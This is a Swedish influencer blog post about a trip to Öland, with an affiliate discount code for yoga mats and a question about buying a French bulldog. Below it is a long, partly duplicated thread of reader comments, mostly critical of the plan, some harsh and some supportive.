framme på öland, redo för Träningshelg och skolavslutning…

Innehåller reklamlänk 

FE017397-C233-4E47-A1EA-403F808A1393

Heeeej!

Alltså denna dagen går till historien 😅 Men nu är vi på plats. Framme på Öland, efter storm, köer och en logistik utan dess like…  Yoga, träning, och skolavslutning står på schemat. Men i omvänd ordning.

Jenny, min kollega och vän är med mig ☺️Såååå kul 💞

B17E9CE9-3E95-4BA9-8252-EBF8C47B78B4

Vi har bilen fullastad med snygga Yoga/träningsmattor ifrån Wilma & Louise. Jag ÄLSKAR dom! 😍 Dessa kommer jag ha i min studio…. Det bästa är att det är vegansk Mocca och den är tvättbar! 💫 Förutom yogamattor så har dom världens snyggare handdukar! (Lägger upp bild senare) 

Jag har ordnat så att du med koden martens20 så kan du beställa en matta, eller vad du vill från deras sortiment och få 20% på hela beställningen, Gäller från idag och hela helgen 🙌🏻💫

-Spana in sortimentet HÄR 

204105B4-88D5-4E8D-B2F5-F6A41F5B3031

A60FD25E-2529-47A0-962D-224000F59A1C

Nu ska jag sova… Lång dag! Lång roadtripp och massa saker på samma gång! 😅 Bilder från gårdagen frisörbesök kommer också sen …. Nu ska vi sova.

Kram och gonatt!

/My Martens 

4DDB4174-A203-4805-9D58-F360CDA7F836

PS: Vi är såååå sugna på en fralla!

Något tips på bra uppfödare? Eller andra ”bra-att-ha” tips? Jag har haft hund i nästan 14 år och är uppvuxen med hund… Men större hundar. Nu med resor, träningsevent och statsliv så tänker jag en mindre strl som kan vara med överallt. Så därför har jag fastnat för en fralla…. ☺️ Eller vilken ras skulle du rekommendera till min livssituation? So dessutom ska bli kompis med Stina och Sture ❤️

115 Komentarer

 1. Tycker man ska satsa på den ras man själv känner för och inte bry sig så mycket om vad andra tycker passar även om det känns impulsivt.

 2. Tycker man ska satsa på den ras man själv känner för och inte bry sig så mycket om vad andra tycker passar även om det känns impulsivt.

 3. Du är fullständigt galen om du skaffar hund med det flackiga liv du lever. Så fullkomligt egoistiskt av dig att ens tänka tanken. Djur är levande varelser och inte någon accessoar ?

 4. Som du sen kan ge bort för den inte ”passar” in i ditt liv längre…..då du kanske inte ”landat” i dig själv eller något annat dramatiskt…SUCK!

 5. Håller helt med Hanna, det är vansinne. Du har ingen koll på ditt mående och flackar hit och dit hela tiden. Det vore oerhört egoistiskt av dig att skaffa en hund i dagsläget.

 6. Läs mina tidigare inlägg.
  Snälla My skaffa inte hund. En hund är inget tillbehör som man tar med överallt.
  Tro mig, du blir så bunden och det är inte alltid lätt att ha med en hund heller.
  Dina katter? Är de med till Öland nu? Vem såg till dem när du var en heldag i Göteborg?
  Katter är lätt, hundar är svårt och tänk på alla som är allergiska.
  Näe, slå det ut hågen snälla du,

 7. Håller med ovanstående svar. Du byter jobb och boenden som jag byter underkläder typ. En hund läs valp behöver ett tryggt och stabilt hem vilket inte du kan erbjuda. Försök landa och hitta dig själv innan du drar in fler i ditt flackande liv. Vem vet hur länge du får bo kvar i lägenheten. Var ska hunden bo när du åker på träningsresor utomlands?
  Du verkar otroligt otrygg och rotlös.

 8. Tycker nog också att du ska vänta med att köpa en hund just nu då det händer så mycket i ditt liv du pendlar fram och tillbaks hela tiden, bor ensam just nu, säljer in resor utomlands, har en studio dit folk kommer som kan vara både rädda och allergiska m.m. Du verkar vara väldigt spontan vilket kan vara kul många gånger men inte när det gäller en hund enligt mig i alla fall.

 9. Du är fullständigt galen om du skaffar hund med det flackiga liv du lever. Så fullkomligt egoistiskt av dig att ens tänka tanken. Djur är levande varelser och inte någon accessoar 😡

 10. Den enda hund du ska ha är en på bild eller möjligtvis en hund i form av mjukdjur Du säger att du haft hund tidigare men den lämnade du ju bort och hon bodde på annat håll många år. Katterna behandlar du som accessoarer och de är inte värda mer än att du flänger hit och dit och de får bo lite varstans. Ditt jobb nu säger du själv kommer att bestå av träningsresor och bygga upp en ny gymverksamhet. Ta och sansa dig lite och inse att du inte bör skaffa någon hund

 11. Som du sen kan ge bort för den inte ”passar” in i ditt liv längre…..då du kanske inte ”landat” i dig själv eller något annat dramatiskt…SUCK!

 12. Det jag funderar på är hur katterna kommer gilla denna ide`?
  Tycker det borde vara skönast för dem att bara ha varandra när de får resa och byta miljö då och då. Katter och hundar pratar olika språk så det är ju inte alls säker katterna kommer uppskatta detta!
  Du ska precis öppna en studio och har en massa olika saker på gång!
  Det låter kul men hur ska du hinna med allt med en liten valp mm som ska bli rumsren o dyl också?
  Pust jag blir lika yr som på karusellerna på Liseberg;)
  Tror det skulle vara bättre att satsa på din studio och få allt att landa lite mer först.
  Tänker också att det måste vara svårare att både skaffa katt och hundvakt?
  Men du kanske har bra djurvakter till hands?
  Tänk efter mycket noga innan! Djur skaffar man och har dem hela livet och får anpassa sina beslut så det fungerar för dem! Vill/kan du vara mer bunden än du redan är, det är frågan du får ställa dig och bara du vet svaret.

 13. Håller helt med Hanna, det är vansinne. Du har ingen koll på ditt mående och flackar hit och dit hela tiden. Det vore oerhört egoistiskt av dig att skaffa en hund i dagsläget.

 14. Läs mina tidigare inlägg.
  Snälla My skaffa inte hund. En hund är inget tillbehör som man tar med överallt.
  Tro mig, du blir så bunden och det är inte alltid lätt att ha med en hund heller.
  Dina katter? Är de med till Öland nu? Vem såg till dem när du var en heldag i Göteborg?
  Katter är lätt, hundar är svårt och tänk på alla som är allergiska.
  Näe, slå det ut hågen snälla du,

 15. Håller med ovanstående svar. Du byter jobb och boenden som jag byter underkläder typ. En hund läs valp behöver ett tryggt och stabilt hem vilket inte du kan erbjuda. Försök landa och hitta dig själv innan du drar in fler i ditt flackande liv. Vem vet hur länge du får bo kvar i lägenheten. Var ska hunden bo när du åker på träningsresor utomlands?
  Du verkar otroligt otrygg och rotlös.

 16. Tycker nog också att du ska vänta med att köpa en hund just nu då det händer så mycket i ditt liv du pendlar fram och tillbaks hela tiden, bor ensam just nu, säljer in resor utomlands, har en studio dit folk kommer som kan vara både rädda och allergiska m.m. Du verkar vara väldigt spontan vilket kan vara kul många gånger men inte när det gäller en hund enligt mig i alla fall.

 17. Den enda hund du ska ha är en på bild eller möjligtvis en hund i form av mjukdjur Du säger att du haft hund tidigare men den lämnade du ju bort och hon bodde på annat håll många år. Katterna behandlar du som accessoarer och de är inte värda mer än att du flänger hit och dit och de får bo lite varstans. Ditt jobb nu säger du själv kommer att bestå av träningsresor och bygga upp en ny gymverksamhet. Ta och sansa dig lite och inse att du inte bör skaffa någon hund

 18. Det jag funderar på är hur katterna kommer gilla denna ide`?
  Tycker det borde vara skönast för dem att bara ha varandra när de får resa och byta miljö då och då. Katter och hundar pratar olika språk så det är ju inte alls säker katterna kommer uppskatta detta!
  Du ska precis öppna en studio och har en massa olika saker på gång!
  Det låter kul men hur ska du hinna med allt med en liten valp mm som ska bli rumsren o dyl också?
  Pust jag blir lika yr som på karusellerna på Liseberg;)
  Tror det skulle vara bättre att satsa på din studio och få allt att landa lite mer först.
  Tänker också att det måste vara svårare att både skaffa katt och hundvakt?
  Men du kanske har bra djurvakter till hands?
  Tänk efter mycket noga innan! Djur skaffar man och har dem hela livet och får anpassa sina beslut så det fungerar för dem! Vill/kan du vara mer bunden än du redan är, det är frågan du får ställa dig och bara du vet svaret.

 19. Som gammal läsare hoppas jag att du förstår att det inte är av elakhet jag skriver detta. Jag hoppas verkligen att du tänker över din livssituation och betänker att du är på resande fot stora delar av din vakna tid. Jag har haft hundar genom hela livet och vet att oavsett storlek behöver de träning, stimulans och engagemang varje dag och inte bara när vi människor känner för det, vill gosa med ett levande djur eller visa upp som accessoar.
  Många hundar far illa även om de visas upp av kändisar som små piffiga pälstillbehör. Många hundar får på tok för lite motion och stimulans så det är rent bedrövligt. Har man en hund är man låst, om man vill ge sin hund ett bra liv vill säga. Då ska den inte vara hos hundvakter under resor, fester och liknande när man inte hinner med dem. Även om det verkar som att endel människor kan ha sin hund med ”överallt” så är det nog ändå bara en bråkdel av tiden som det funkar i praktiken.
  Så snälla, för hundens skull, lägg hundplanerna på hyllan så länge du har ett så rörligt liv som du har. Var nöjd med de vackra Stina och Sture och försök stanna upp och SE vad du redan har omkring dig.
  Innan man skaffar en hund behöver man sätta sig ner och verkligen fundera över VARFÖR man vill ha en hund och passar den verkligen in i det liv man lever? Vill man ha hund för att alla andra har en, för att vara trendig eller på grund av att man fått en plötslig ingivelse att man vill ha hund, ja då bör man istället köpa sig ett uppstoppat leksaksdjur som man kan slänga in i en garderob när nyhetens behag lagt sig. En hund är inte något man skaffar och sen omplacerar när det börjar bli lite jobbigt. Och ja, det är ett jobb att ha en frisk välmående hund, det kommer inte gratis. Det är därför det tyvärr finns så många unga hundar som behöver omplacering på grund av ”allergi”…..
  Så nej, tänk om och ägna dig helhjärtat åt allt det du har på gång. Med en hund kommer du att ha ytterligare ett dåligt samvete som kommer att ligga på dig konstant.
  Och det här är skrivet med omtanke om både dig och hunden. Kram

 20. Skriver detta i välmening. Det är tyvärr inte trevligt för en hund att pendla eller optimalt vara med hundvakter, särskilt inte det första året. Det är en lång resa för en hund samt en ny plats. Inte heller säkert att det blir uppskattat av katterna att plötsligt få en ny familjemedlem, det är helt omöjligt att säga hur det kommer att funka över längre tid och hur deras mående kommer att påverkas av det. Tänk på dem i första hand.
  Du har två underbara husdjur, förstår att det kan kännas som en härlig tanke att ha hund och du har ju som du skriver jättestor erfarenhet av detta. Jag själv är djurtokig och mår bra av att vara inpå djur, men man måste även tänka på hur allt blir i långa loppet. Har man en stabil situation där man vet att hunden kommer att passa in under många många år och att den kommer att få ett så bra liv som den förtjänar med massa massa tid, lugn och ro och trygghet.
  Ta inte detta fel, men för både din och hundens skull, vänta åtminstone ett halvår och se om suget då kvarstår och om livssituationen då ser likadan ut. detta är ju inget som måste ske akut just nu eller hur? Precis när du öppnar studio mm. Är det verkligen något som är rätt så kommer ju längtan och förutsättningarna att skaffa hund att finnas kvar och då har du lite tid att se hur allt kommer utveckla sig.
  Hur ställer sig Jonas till hund? Om ni tänker ett långsiktigt förhållande där hunden alltid kommer att vara med då ni umgås/bor ihop.
  Gällande ras skulle jag inte rekommendera fralla då de tyvärr ofta drabbas av sjukdomar samt ofta har andningsproblematik.

 21. Jag säger bara ”suck” !!!! Livet får tydligen inte vara enkelt för då måste man krångla till det med att skaffa en hund t.ex. Ibland tror jag du skulle behöva en klok och sund person som hjälper dig att leva realistiskt.

 22. Som gammal läsare hoppas jag att du förstår att det inte är av elakhet jag skriver detta. Jag hoppas verkligen att du tänker över din livssituation och betänker att du är på resande fot stora delar av din vakna tid. Jag har haft hundar genom hela livet och vet att oavsett storlek behöver de träning, stimulans och engagemang varje dag och inte bara när vi människor känner för det, vill gosa med ett levande djur eller visa upp som accessoar.

  Många hundar far illa även om de visas upp av kändisar som små piffiga pälstillbehör. Många hundar får på tok för lite motion och stimulans så det är rent bedrövligt. Har man en hund är man låst, om man vill ge sin hund ett bra liv vill säga. Då ska den inte vara hos hundvakter under resor, fester och liknande när man inte hinner med dem. Även om det verkar som att endel människor kan ha sin hund med ”överallt” så är det nog ändå bara en bråkdel av tiden som det funkar i praktiken.

  Så snälla, för hundens skull, lägg hundplanerna på hyllan så länge du har ett så rörligt liv som du har. Var nöjd med de vackra Stina och Sture och försök stanna upp och SE vad du redan har omkring dig.

  Innan man skaffar en hund behöver man sätta sig ner och verkligen fundera över VARFÖR man vill ha en hund och passar den verkligen in i det liv man lever? Vill man ha hund för att alla andra har en, för att vara trendig eller på grund av att man fått en plötslig ingivelse att man vill ha hund, ja då bör man istället köpa sig ett uppstoppat leksaksdjur som man kan slänga in i en garderob när nyhetens behag lagt sig. En hund är inte något man skaffar och sen omplacerar när det börjar bli lite jobbigt. Och ja, det är ett jobb att ha en frisk välmående hund, det kommer inte gratis. Det är därför det tyvärr finns så många unga hundar som behöver omplacering på grund av ”allergi”…..

  Så nej, tänk om och ägna dig helhjärtat åt allt det du har på gång. Med en hund kommer du att ha ytterligare ett dåligt samvete som kommer att ligga på dig konstant.
  Och det här är skrivet med omtanke om både dig och hunden. Kram

 23. Ta först och främst hand om dina katter.Du hade ju inga svårigheter att lämna dom ifrån dig när katterna inte behagade indianen

  • Lite taskigt sagt iofs, hon var ju uppenbarligen ledsen när katterna fick flytta.
   Dock håller jag med om att en hund inte känns rätt i detta läge.

 24. Hej, jag håller med de andra som skrivet här, skaffa inte hund, eftersom din tidigare hund inte fixade att åka hit o dit, samt att dina katter lämna du bort ett tag plus att de pendla ett tag, så tycker jag att du skulle se av erfarenhet att djur inte funkar med ditt liv för tillfälligt. Om du så gärna vill ha hund vid din sida så kan du kanske passa dina vänners hundar när de åker på semester o inte krockar med alla dina resor. Är själv hundägare sen 15 år tillbaka o vet vad det innebär med djur.

 25. Skriver detta i välmening. Det är tyvärr inte trevligt för en hund att pendla eller optimalt vara med hundvakter, särskilt inte det första året. Det är en lång resa för en hund samt en ny plats. Inte heller säkert att det blir uppskattat av katterna att plötsligt få en ny familjemedlem, det är helt omöjligt att säga hur det kommer att funka över längre tid och hur deras mående kommer att påverkas av det. Tänk på dem i första hand.

  Du har två underbara husdjur, förstår att det kan kännas som en härlig tanke att ha hund och du har ju som du skriver jättestor erfarenhet av detta. Jag själv är djurtokig och mår bra av att vara inpå djur, men man måste även tänka på hur allt blir i långa loppet. Har man en stabil situation där man vet att hunden kommer att passa in under många många år och att den kommer att få ett så bra liv som den förtjänar med massa massa tid, lugn och ro och trygghet.

  Ta inte detta fel, men för både din och hundens skull, vänta åtminstone ett halvår och se om suget då kvarstår och om livssituationen då ser likadan ut. detta är ju inget som måste ske akut just nu eller hur? Precis när du öppnar studio mm. Är det verkligen något som är rätt så kommer ju längtan och förutsättningarna att skaffa hund att finnas kvar och då har du lite tid att se hur allt kommer utveckla sig.
  Hur ställer sig Jonas till hund? Om ni tänker ett långsiktigt förhållande där hunden alltid kommer att vara med då ni umgås/bor ihop.

  Gällande ras skulle jag inte rekommendera fralla då de tyvärr ofta drabbas av sjukdomar samt ofta har andningsproblematik.

 26. Jag säger bara ”suck” !!!! Livet får tydligen inte vara enkelt för då måste man krångla till det med att skaffa en hund t.ex. Ibland tror jag du skulle behöva en klok och sund person som hjälper dig att leva realistiskt.

 27. Jag röstar på mops istället! Har själv två stycken. De är så okomplicerade, trogna, roliga och ens bästa vän i alla lägen! ❤ lycka till!

 28. Det här är nog skrivet bara för att dra kommentarer….
  Annars My: fråga bianca Ingrosso hur praktiskt hon tycker att det är med hund. Även om de är små så kan de inte vara med överallt. Låter som det är hennes assistent som får ta hand om dem.

 29. Ta först och främst hand om dina katter.Du hade ju inga svårigheter att lämna dom ifrån dig när katterna inte behagade indianen

  • Lite taskigt sagt iofs, hon var ju uppenbarligen ledsen när katterna fick flytta.
   Dock håller jag med om att en hund inte känns rätt i detta läge.

 30. Äsch lyssna inte på alla snillen som spekulerar. Absolut ska du skaffa hund, du har väl all tid i världen, den kan åka med på tunnelbanan nu när du bor i innerstan. Jättemysigt att bo nära inpå varandra i din lilla lägenhet med katterna. Alla ryms i sovalkoven. Praktiskt med litet när det blir lite hår av katterna och hunden, men det går ju fort att dammsuga. Robotdammsugare kanske på spons? Enkelt också att bara springa ner på gatan i stan mitt i natten innan den är rumsren. Låter som en kanonidé. Ska du inte köpa två när du ändå är igång? Du kanske tom kan få rabatt hos uppfödaren och på försäkringen. Sen är den ju aldrig ensam och du och lilleman får varsin. Han kanske kan ta med dem när han flyger eller du får mer sällskap när du pendlar. Super i nya gymstudion, där kan de leka tillsammans. Inte alla kunder är allergiska. Låter även som en dröm för Jonas, han verkar som en riktig djurvän. Ett av de bästa beslut du har tagit, du är verkligen klok som en bok.

 31. NEJ! Du har redan två katter o ta hand om.
  Tänk på hunden, inte dig själv.
  En hund behöver mycket motion.
  En trygg miljö.
  Finns ingen hund som mår bra av att bli bortlämnad eller hänga med influencers
  på event!
  Jag är förvånad över att du ens tänker tanken eftersom du hade hund och var tvungen att lämna bort henne till din extra pappa.

 32. Hej, jag håller med de andra som skrivet här, skaffa inte hund, eftersom din tidigare hund inte fixade att åka hit o dit, samt att dina katter lämna du bort ett tag plus att de pendla ett tag, så tycker jag att du skulle se av erfarenhet att djur inte funkar med ditt liv för tillfälligt. Om du så gärna vill ha hund vid din sida så kan du kanske passa dina vänners hundar när de åker på semester o inte krockar med alla dina resor. Är själv hundägare sen 15 år tillbaka o vet vad det innebär med djur.

 33. Jag röstar på mops istället! Har själv två stycken. De är så okomplicerade, trogna, roliga och ens bästa vän i alla lägen! ❤ lycka till!

 34. Det här är nog skrivet bara för att dra kommentarer….
  Annars My: fråga bianca Ingrosso hur praktiskt hon tycker att det är med hund. Även om de är små så kan de inte vara med överallt. Låter som det är hennes assistent som får ta hand om dem.

 35. Ja vad ska man säga My. Känns som du verkligen börjar tappa fattningen. Du gräver bara djupare och djupare. Att du orkar hålla alla bollar i luften. Det svänger oerhört snabbt. Händer nya saker varje dag. Jag måste ofta gå tillbaka i din bloggs tidigare inlägg för att se om jag missuppfattat något. Du som utbränd kör ändå in i kaklet från dag 1. Ena dagen vd sedan hälso influenser och sedan gymägare. Du ska då i allt detta anordna event och hälsoresor . Jag vet inte om du är övermänsklig. Och mitt i allt detta ska du köpa hund. Och att sedan mitt i allt detta så ska du vara mamma och pendla fram och tillbaka till Öland. Känns som bäddat för att du ska krascha igen. Har tidigare tyckt att din blogg varit väldigt trevlig att läsa men nu börjar det bli dels rörigt och ganska ointressant. Hoppas att du någon dag hittar en balans där du mår bra och blir trygg. Att du inte heller känner att du behöver bevisa något för någon annan än dig själv. Ibland kan det vara bra att stanna upp och reflektera. Tycker dessutom.att ditt sk team av läkare och terapeuter borde fått dig att inte gå ut så hårt. Oproffsigt rent av. Men kanske det är ett sätt för dig att inte tänka genom.alla sk projekt du tar dig an. Kan det inte kännas bättre att inte ta på så mycket och slutföra projekten. Att se att du klarar det du påbörjar. Det kommer att ge dig styrka. Ha en fin sommar.

 36. Äsch lyssna inte på alla snillen som spekulerar. Absolut ska du skaffa hund, du har väl all tid i världen, den kan åka med på tunnelbanan nu när du bor i innerstan. Jättemysigt att bo nära inpå varandra i din lilla lägenhet med katterna. Alla ryms i sovalkoven. Praktiskt med litet när det blir lite hår av katterna och hunden, men det går ju fort att dammsuga. Robotdammsugare kanske på spons? Enkelt också att bara springa ner på gatan i stan mitt i natten innan den är rumsren. Låter som en kanonidé. Ska du inte köpa två när du ändå är igång? Du kanske tom kan få rabatt hos uppfödaren och på försäkringen. Sen är den ju aldrig ensam och du och lilleman får varsin. Han kanske kan ta med dem när han flyger eller du får mer sällskap när du pendlar. Super i nya gymstudion, där kan de leka tillsammans. Inte alla kunder är allergiska. Låter även som en dröm för Jonas, han verkar som en riktig djurvän. Ett av de bästa beslut du har tagit, du är verkligen klok som en bok.

 37. Tror My skriver detta för att provocera. Ju fler klick desto mer pengar. Kanske dags för Fillerspåfyllning i läpparna.

 38. NEJ! Du har redan två katter o ta hand om.

  Tänk på hunden, inte dig själv.

  En hund behöver mycket motion.
  En trygg miljö.
  Finns ingen hund som mår bra av att bli bortlämnad eller hänga med influencers
  på event!

  Jag är förvånad över att du ens tänker tanken eftersom du hade hund och var tvungen att lämna bort henne till din extra pappa.

 39. Ja vad ska man säga My. Känns som du verkligen börjar tappa fattningen. Du gräver bara djupare och djupare. Att du orkar hålla alla bollar i luften. Det svänger oerhört snabbt. Händer nya saker varje dag. Jag måste ofta gå tillbaka i din bloggs tidigare inlägg för att se om jag missuppfattat något. Du som utbränd kör ändå in i kaklet från dag 1. Ena dagen vd sedan hälso influenser och sedan gymägare. Du ska då i allt detta anordna event och hälsoresor . Jag vet inte om du är övermänsklig. Och mitt i allt detta ska du köpa hund. Och att sedan mitt i allt detta så ska du vara mamma och pendla fram och tillbaka till Öland. Känns som bäddat för att du ska krascha igen. Har tidigare tyckt att din blogg varit väldigt trevlig att läsa men nu börjar det bli dels rörigt och ganska ointressant. Hoppas att du någon dag hittar en balans där du mår bra och blir trygg. Att du inte heller känner att du behöver bevisa något för någon annan än dig själv. Ibland kan det vara bra att stanna upp och reflektera. Tycker dessutom.att ditt sk team av läkare och terapeuter borde fått dig att inte gå ut så hårt. Oproffsigt rent av. Men kanske det är ett sätt för dig att inte tänka genom.alla sk projekt du tar dig an. Kan det inte kännas bättre att inte ta på så mycket och slutföra projekten. Att se att du klarar det du påbörjar. Det kommer att ge dig styrka. Ha en fin sommar.

 40. Tror My skriver detta för att provocera. Ju fler klick desto mer pengar. Kanske dags för Fillerspåfyllning i läpparna.

 41. […] Något tips på bra uppfödare? Eller andra ”bra-att-ha” tips? Jag har haft hund i nästan 14 år och är uppvuxen med hund… Men större hundar. Nu med resor, träningsevent och statsliv så tänker jag en mindre strl som kan vara med överallt. Så därför har jag fastnat för en fralla…. ☺️ Eller vilken ras skulle du rekommendera till min livssituation? So dessutom ska bli kompis med Stina och Sture ❤️//My Martens […]

 42. Ta ett vuxenansvar och inse att du ej har tid för hund. Ett djur skaffar man inte för att fylla ett hål för stunden, det kräver omsorg, tid och kärlek. Hoppas att du själv inser att de inte är läge att köpa hund. Om inte annat hoppas jag att varje uppfödare ni möter sätter stopp.

 43. Fyyyyy faen vad elaka saker som skrivs här!!!! Elaka påhopp och en jäkla massa antagande om än det ena än det andra! Ni borde skämmas över hur ni beter er och jag hoppas verkligen inte att ni är så elaka i verkliga livet som ni framstår när ni uttalar er här!! Inte konstigt att samhället ser ut som detgör numera när man läser kommentarer på olika blogg sidor. Många kramar till dig My och hoppas du skiter i alla elaka subbor ❤

 44. Eftersom du själv frågade om råd så hoppas jag att du tar till dig vad dina läsare tycker och låter bli att köpa en hund just nu, en hund köper man inte efter ett plötsligt infall (som det ser ut att vara efter att du mött den här lilla Frallan) en hund behöver lugn, ro och fasta rutiner åtminstone i början och det känns inte som dina vardagar kan erbjuda det just nu. Det här känns lite överilat och inte särskilt vuxet du får ursäkta uttrycket men det gör det absolut inte och en hund är inte en accessoar eller något man bara stoppar i en väska och tar med sig var och när som helst även om den är liten. När du har kommit till ro med ditt liv ja då är det något helt annat men absolut inte nu.

 45. Svaret du behöver höra är att du inte ska ha djur när du reser så mkt.
  Du har uppenvarligen inte tid för att engagera dig och ta hand om den om du flänger och far så.

 46. […] Något tips på bra uppfödare? Eller andra ”bra-att-ha” tips? Jag har haft hund i nästan 14 år och är uppvuxen med hund… Men större hundar. Nu med resor, träningsevent och statsliv så tänker jag en mindre strl som kan vara med överallt. Så därför har jag fastnat för en fralla…. ☺️ Eller vilken ras skulle du rekommendera till min livssituation? So dessutom ska bli kompis med Stina och Sture ❤️//My Martens […]

 47. Ta ett vuxenansvar och inse att du ej har tid för hund. Ett djur skaffar man inte för att fylla ett hål för stunden, det kräver omsorg, tid och kärlek. Hoppas att du själv inser att de inte är läge att köpa hund. Om inte annat hoppas jag att varje uppfödare ni möter sätter stopp.

 48. Fyyyyy faen vad elaka saker som skrivs här!!!! Elaka påhopp och en jäkla massa antagande om än det ena än det andra! Ni borde skämmas över hur ni beter er och jag hoppas verkligen inte att ni är så elaka i verkliga livet som ni framstår när ni uttalar er här!! Inte konstigt att samhället ser ut som detgör numera när man läser kommentarer på olika blogg sidor. Många kramar till dig My och hoppas du skiter i alla elaka subbor ❤

 49. Hej!
  Tycker man ska tänka över beslutet noga innan man skaffar hund. Har man en livssituation där man reser mycket eller allmänt har mycket som händer just nu är nog inte en valp de bästa. Hundar behöver trygghet, sällskap och mycket motion och stimulans oavsett storlek. Sedan är fransk bulldog en hund som fått mycket problem med andningen som de lider väldigt mycket av. Så även fast de är himla söta så bör man tänka på att skaffa en annan ras för hunden skull.

 50. Eftersom du själv frågade om råd så hoppas jag att du tar till dig vad dina läsare tycker och låter bli att köpa en hund just nu, en hund köper man inte efter ett plötsligt infall (som det ser ut att vara efter att du mött den här lilla Frallan) en hund behöver lugn, ro och fasta rutiner åtminstone i början och det känns inte som dina vardagar kan erbjuda det just nu. Det här känns lite överilat och inte särskilt vuxet du får ursäkta uttrycket men det gör det absolut inte och en hund är inte en accessoar eller något man bara stoppar i en väska och tar med sig var och när som helst även om den är liten. När du har kommit till ro med ditt liv ja då är det något helt annat men absolut inte nu.

 51. Hej!
  Jag rekommenderar inte fralla då de flesta har sådana problem med luftvägar. Det värsta är att många frallaägare inte ens märker själva hur deras hund kippar efter andan. Frågade en vän som är involverad i rasen och jobbar på klinik hur vanligt det är. Säkert 80% av alla har andningssvårigheter och antingen fattar inte ägaren eller så blundar det. Djurplågeri… Blir också värre av alla idioter som köper vad det tror är en fralla men utan papper.

 52. Svaret du behöver höra är att du inte ska ha djur när du reser så mkt.
  Du har uppenvarligen inte tid för att engagera dig och ta hand om den om du flänger och far så.

 53. Hej!

  Tycker man ska tänka över beslutet noga innan man skaffar hund. Har man en livssituation där man reser mycket eller allmänt har mycket som händer just nu är nog inte en valp de bästa. Hundar behöver trygghet, sällskap och mycket motion och stimulans oavsett storlek. Sedan är fransk bulldog en hund som fått mycket problem med andningen som de lider väldigt mycket av. Så även fast de är himla söta så bör man tänka på att skaffa en annan ras för hunden skull.

 54. Som typ en miljard personer skriver – är frallor sönderavlade. Deras anatomi har tagit så jäkla mycket stryk men det övertygande argumentet för min del är att de har så otroligt svårt att andas. Sommar och värme är en hemsk period för många frallor. Dessutom fiser de riktigt illaluktande fisar hehe. Köp en hund som är frisk eller adoptera en hund så slipper du valpåren (är där nu med sömnbrist som konsekvens).
  Du har ju haft hund så du vet vad som krävs. Men min livsstil jmf med när jag var yngre är helt annorlunda och jag fick helt enkelt överväga vilka uppoffringar jag kommer behöva göra. Sen är det ju tur att man har 20 personer på kö till hundvakt (ah, iaf nu när han är ett gulligt monster)
  Lycka till!

 55. Hej!
  Jag rekommenderar inte fralla då de flesta har sådana problem med luftvägar. Det värsta är att många frallaägare inte ens märker själva hur deras hund kippar efter andan. Frågade en vän som är involverad i rasen och jobbar på klinik hur vanligt det är. Säkert 80% av alla har andningssvårigheter och antingen fattar inte ägaren eller så blundar det. Djurplågeri… Blir också värre av alla idioter som köper vad det tror är en fralla men utan papper.

 56. ’Nu med resor, träningsevent och statsliv så tänker jag en mindre strl som kan vara med överallt. Så därför har jag fastnat för en fralla…. ☺️ Eller vilken ras skulle du rekommendera till min livssituation? So dessutom ska bli kompis med Stina och Sture’
  Din livssituation??
  Börja med att rannsaka dig själv, ditt liv o din livssituation.
  Starta med att få till en grundtrygghet och stabilitet i ditt liv!
  Ta hand om din son o lägg ’hundtiden’ på allt runt honom ist. HAN är väl den enda som ska få extra tid o omsorg i din svajande livssituation.
  Du själv skulle också må bra av att få tid med att hitta stabilitet.

 57. Håller med dom allra flesta. Du ska inte skaffa en hund. Katter är en helt annan sak men även där måste du enligt jordbruksverket se till katterna med minst 5 timmars mellanrum precis som med hund. Skillnaden är att katt klarar sig själva på ett helt annat sätt än hundar och det borde du ju veta. Du flackar och far och det är inte bra att flacka med djur så mycket som du gör.
  Ta hand om det du bygger upp nu istället

 58. Alltså på riktgt !
  Ni här inne är ju inte friska. Här frågar my
  Om råd o ni ballar ut totalt. Ni borde ju verkligen inte vara inne här ens. Vilka påhopp. Ni känner ju inte Ens my.
  Jag tycker my inspirerar är snygg som fan o verkligen kämpar i livet för att
  Leva. Hon löser det o
  Ibland dippar hon men hon har i alla fall
  Levt !!
  Heja dig my ! Du är kämpe !!
  Så d e så !

  • Att my är ”snygg som fan” är det nog ingen som betvivlar, det är inte de detta gäller.
   Hon bad om råd och folk reagerar. Många kommentarer är sakliga och innehåller inga påhopp. Andra är översittar kommentarer och inte så snälla. Men överlag är det flesta konstruktiv kritik iaf enligt mig.

  • Vad har snygghet och kämpe med det hör inlägget att göra??? Hon ställde en fråga / bad om råd och fick många sakliga sådana också så lägg ner det här larvet man måste ju kunna komma med konstruktiva svar / kritik utan att vara elak eller ”inte frisk” som du uttrycker det larvigt och barnslig kommentar.

  • Hannah, det där var inte snällt sagt. Vad är det för fel med det jag skrev? Vad är anledningen att du skrev att jag inte är frisk? Du skrev ni och det innebär även mig. Det är fruktansvärt att skriva en sån mening.

 59. Som typ en miljard personer skriver – är frallor sönderavlade. Deras anatomi har tagit så jäkla mycket stryk men det övertygande argumentet för min del är att de har så otroligt svårt att andas. Sommar och värme är en hemsk period för många frallor. Dessutom fiser de riktigt illaluktande fisar hehe. Köp en hund som är frisk eller adoptera en hund så slipper du valpåren (är där nu med sömnbrist som konsekvens).

  Du har ju haft hund så du vet vad som krävs. Men min livsstil jmf med när jag var yngre är helt annorlunda och jag fick helt enkelt överväga vilka uppoffringar jag kommer behöva göra. Sen är det ju tur att man har 20 personer på kö till hundvakt (ah, iaf nu när han är ett gulligt monster)

  Lycka till!

 60. ’Nu med resor, träningsevent och statsliv så tänker jag en mindre strl som kan vara med överallt. Så därför har jag fastnat för en fralla…. ☺️ Eller vilken ras skulle du rekommendera till min livssituation? So dessutom ska bli kompis med Stina och Sture’

  Din livssituation??
  Börja med att rannsaka dig själv, ditt liv o din livssituation.
  Starta med att få till en grundtrygghet och stabilitet i ditt liv!
  Ta hand om din son o lägg ’hundtiden’ på allt runt honom ist. HAN är väl den enda som ska få extra tid o omsorg i din svajande livssituation.
  Du själv skulle också må bra av att få tid med att hitta stabilitet.

 61. Håller med dom allra flesta. Du ska inte skaffa en hund. Katter är en helt annan sak men även där måste du enligt jordbruksverket se till katterna med minst 5 timmars mellanrum precis som med hund. Skillnaden är att katt klarar sig själva på ett helt annat sätt än hundar och det borde du ju veta. Du flackar och far och det är inte bra att flacka med djur så mycket som du gör.
  Ta hand om det du bygger upp nu istället

 62. Alltså på riktgt !
  Ni här inne är ju inte friska. Här frågar my
  Om råd o ni ballar ut totalt. Ni borde ju verkligen inte vara inne här ens. Vilka påhopp. Ni känner ju inte Ens my.

  Jag tycker my inspirerar är snygg som fan o verkligen kämpar i livet för att
